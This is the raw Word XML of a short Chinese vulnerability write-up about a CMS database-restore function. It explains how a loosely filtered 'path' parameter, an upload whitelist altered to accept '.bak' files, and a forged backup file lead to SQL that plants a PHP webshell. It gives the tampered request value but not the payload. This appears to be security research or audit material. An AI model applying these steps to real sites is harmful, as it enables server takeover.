                        <w:t>当使用mysql数据库时，提取备份数据库文件的sql创建语句，并且在下面的执行函数中执行这些sql语句,在这个过程中，其还原的数据库备份文件路径$backpath是可控的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424180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2250440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2330450" cy="133985"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="1206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7180" y="5319395"/>
                          <a:ext cx="2330450" cy="13398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.4pt;margin-top:177.2pt;height:10.55pt;width:183.5pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAc5OuU9cAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PS0/DMBCE70j8B2srcaNOyKMojdMDoicOQKnE1Y2XJKpf&#10;sp02/HuWExx3dnb2m3a3GM0uGOLkrIB8nQFD2zs12UHA8WN//wgsJmmV1M6igG+MsOtub1rZKHe1&#10;73g5pIFRiI2NFDCm5BvOYz+ikXHtPFrafblgZKIxDFwFeaVwo/lDltXcyMnSh1F6fBqxPx9mQxhe&#10;v3k1v56Pn/myD8/qJcphI8TdKs+2wBIu6c8Mv/h0Ax0xndxsVWRaQF0TeRJQVGUJjAxlUZByImVT&#10;VcC7lv+v0P0AUEsDBBQAAAAIAIdO4kCFTiY7eAIAANcEAAAOAAAAZHJzL2Uyb0RvYy54bWytVMtu&#10;EzEU3SPxD5b3dCaZpE2iTqqoURBSRSsVxNrxeDKW/MJ2HuVnkNjxEXwO4jc49qQPCosuyMK5d+7x&#10;ub7H9/r84qAV2QkfpDU1HZyUlAjDbSPNpqYfP6zeTCgJkZmGKWtETe9EoBfz16/O924mhrazqhGe&#10;gMSE2d7VtIvRzYoi8E5oFk6sEwbB1nrNIly/KRrP9mDXqhiW5Wmxt75x3nIRAr4u+yA9MvqXENq2&#10;lVwsLd9qYWLP6oViESWFTrpA5/m0bSt4vG7bICJRNUWlMa9IAnud1mJ+zmYbz1wn+fEI7CVHeFaT&#10;ZtIg6QPVkkVGtl7+RaUl9zbYNp5wq4u+kKwIqhiUz7S57ZgTuRZIHdyD6OH/0fL3uxtPZFPTihLD&#10;NC7819fvP398I1XSZu/CDJBbd+OPXoCZCj20Xqd/lEAO6KPx6dlgAlXvajquBtNqOu61FYdIOADD&#10;qipHYwA4EIOqmk4yoHhkcj7Et8JqkoyaetxdlpTtrkJEdkDvISmxsSupVL4/ZcgepMOzMvEzNGWL&#10;ZoCpHQoLZkMJUxt0O48+UwarZJO2J6LgN+tL5cmOoUdWqxK/dHSk+wOWci9Z6HpcDvUVahkxEErq&#10;mk7S5vvdyoAkCdhLlqy1be4gt7d9HwbHVxK0VyzEG+bReDg/RjNeY2mVRVH2aFHSWf/lX98THv2A&#10;KCV7NDIK/rxlXlCi3hl0ynQwGoE2Zmc0PhvC8U8j66cRs9WXFjoM8Ag4ns2Ej+rebL3VnzDBi5QV&#10;IWY4cvfSHp3L2A8Y3gAuFosMQ7c7Fq/MreOJvL/AxTbaVua7fVTnKBr6Pd/BcTbTQD31M+rxPZr/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HOTrlPXAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kCFTiY7eAIAANcEAAAOAAAAAAAAAAEAIAAAACYB&#10;AABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAQ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/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w: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  <w:t>1.在上面的代码中</w:t>
      </w:r>
      <w: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32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$path通过post方法传入，是可控的,而safe_url只是进行了一些基础过滤，并不严格。而下面的$backpath正是使用$path进行拼接。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当使用mysql数据库时，提取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$backpath路径下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库备份文件的sql创建语句，并且在下面的执行函数中执行这些sql语句，在这个过程中，其还原的数据库备份文件路径$backpath是可控的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.这个cms系统允许我们设置上传文件的白名单，那么就在图片白名单中加入bak,使其可以上传我们伪造的数据库文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="3537585"/>
            <wp:effectExtent l="0" t="0" r="5715" b="571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2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w: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  <w:t>3.于是就考虑使用我们上传的自己构造的数据库备份文件进行还原，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$backpath修改为我们上传的数据库备份文件的路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>于是在还原数据库的数据包中将path的值改为%2Fadmin%2Fbackup%2F1694764390.bak(上传的数据库备份文件路径)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就可以使得网站还原数据库时使用我们构造的恶意数据库备份文件，这个恶意数据库备份文件中使用sql语句创建php木马，导致getshell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revisionView w:markup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E0ZDMxOWMxYTAxYTYxYWQyM2RhYmNhNmEwNjFjMzMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="09882708"/>
    <w:rsid w:val="0A37566F"/>
    <w:rsid w:val="138D6203"/>
    <w:rsid w:val="19CD07CA"/>
    <w:rsid w:val="20B136AC"/>
    <w:rsid w:val="2E5F4E87"/>
    <w:rsid w:val="5A4C5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925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2023-09-15T08:28:00Z</dcterms:created>
  <dc:creator>LEGION</dc:creator>
  <cp:lastModifiedBy>宇</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-16T02:31:26Z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557F157C8E47472EB1227961D3C20AE4_12</vt:lpwstr>
  </property>
</Properties>
</file>